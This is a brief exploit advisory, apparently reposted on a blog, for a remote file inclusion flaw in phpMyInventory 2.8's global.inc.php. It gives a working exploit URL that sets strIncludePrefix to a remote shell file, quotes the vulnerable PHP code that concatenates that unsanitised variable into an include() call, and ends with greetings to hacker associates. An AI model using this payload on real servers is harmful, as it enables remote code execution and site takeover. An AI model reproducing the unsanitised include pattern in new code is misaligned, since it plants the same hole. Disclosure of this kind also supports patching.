global.inc php,phpMyInventory 2.8 (global.inc.php) Remote File Inclusion Vulnerability

########################################################################################

phpMyInventory (pmi)

v. 2.8

FOUND BY : o0xxdark0o

                   o0xxdark0o[at]msn.com

DOWNLOAD : http://sourceforge.net/projects/phpmyinventory/

REMOTE FILE ICLUDE

########################################################################################

FILE :

PATH\Includes\global.inc.php

########################################################################################

EXPLOIT:

www.xxx.com/pmi_v28/Includes/global.inc.php?strIncludePrefix=Shell.txt?

########################################################################################

thanks for all my friends.. str0ke ... oxdo .... cold z3ro...keenest

www.hach-teach.org - www.3asfh.com - www.goldenawy.com - www.yee7.com

########################################################################################

CODE:

<?

 // where rare administrative emails will go

 $adminEmail  = "youraddress@yourdomain.com";

 $secureAdmin = 0; # set to 1 if SSL is available

 $sslPort = 443; # what port, if using SSL?

 $rowLimit = 12; # how many records any given page should show at one time

 # -------------------------------------------------------------------- #

 session_register("userID");

 session_register("sessionTime");

 session_register("sessionSecurity");

 // by creating a separate set of includes for different domain names,

 // you can serve multiple PMI's from one codebase.

 //

 // if ($SERVER_NAME = "dev.3gwt.net") {

 //    $includeFolder = "Includes/3gwt";

 // } else if ($SERVER_NAME = "www.foozball.com") {

 //    $includeFolder = "Includes/foozball";

 // } else {

       $includeFolder = "Includes";

 // }

 $strIncludePrefix = $strIncludePrefix.$includeFolder;

 Include($strIncludePrefix."/db.inc.php");

-----there is more of the code download to see it in v. 2.8-----

########################################################################################

BY : o0xxdark0o

      o0xxdark0o@msn.com

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值